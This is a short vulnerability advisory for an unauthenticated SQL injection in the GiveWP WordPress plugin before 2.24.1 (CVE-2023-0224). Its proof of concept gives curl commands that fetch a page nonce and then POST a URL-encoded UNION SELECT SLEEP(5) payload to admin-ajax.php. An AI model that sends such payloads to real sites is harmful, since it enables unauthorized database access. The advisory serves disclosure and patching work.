GiveWP < 2.24.1 – Unauthenticated SQLi | CVE 2023-0224

Description

The plugin does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks

Proof of Concept

1) Create a post/page that contains the "Donor Wall" block.

2) Using the default donation form, send a test donation

3) In a terminal, edit and run the following command, and copy the nonce it gives you
   curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"'

4) Still in the terminal, edit and run the following command:
   curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23'

Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1)